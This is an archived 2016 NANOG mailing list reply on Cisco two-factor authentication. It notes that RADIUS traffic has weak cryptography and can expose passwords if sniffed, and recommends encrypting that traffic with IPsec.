[190338] in North American Network Operators' Group
Re: Cisco 2 factor authentication
daemon@ATHENA.MIT.EDU (Tom Smyth)
Sun Jun 26 21:36:13 2016
X-Original-To: nanog@nanog.org
In-Reply-To: <CAAAwwbUCrC3VX106bfEV0AyBFu2mroPUJt_gfUZrQsiMdWgLJg@mail.gmail.com>
Date: Mon, 27 Jun 2016 02:36:10 +0100
From: Tom Smyth <tom.smyth@wirelessconnect.eu>
To: Jimmy Hess <mysidia@gmail.com>
Cc: NANOG <nanog@nanog.org>
Errors-To: nanog-bounces@nanog.org
The radius protocol traffic can be encrypted with ipsec policies...if
confidentiality of the radius traffic is a concern ( particularly if
traversing untrusted networks)
On 26 Jun 2016 3:48 a.m., "Jimmy Hess" <mysidia@gmail.com> wrote:
> On Wed, Jun 22, 2016 at 9:38 PM, Chris Lawrence
> <clawrence@dovefire.co.uk> wrote:
> > Any radius based auth works well I've used a solution by secure envoy I
> the past which seems to work well they also have soft token apps, hard
> tokens plus SMS based.
>
> However, a cautionary note there is that RADIUS protocol itself uses
> only weak cryptography and is not secure on the wire.
>
> That is, in the absence of AES Keywrap proprietary extension Or when
> the method of credential used is not authentication using a
> Client-side Certificate (PKI) as in *EAP.
>
> Specifically: if RADIUS is used for the Authentication stage of AAA
> with a code sent by SMS or OATH token [User types Normal password +
> One Time Password], then when traffic between RADIUS server and VPN
> device is captured: The user credentials may be exposed with the
> extremely weak crypto protection RADIUS or NTLM provides for the
> user password.
>
> If a user re-uses their same password somewhere else on a device not
> requiring 2FA, then capturing RADIUS traffic could be an effective
> privilege escalation By copying victim's password from a sniffed
> RADIUS exchange.
>
> --
> -JH
>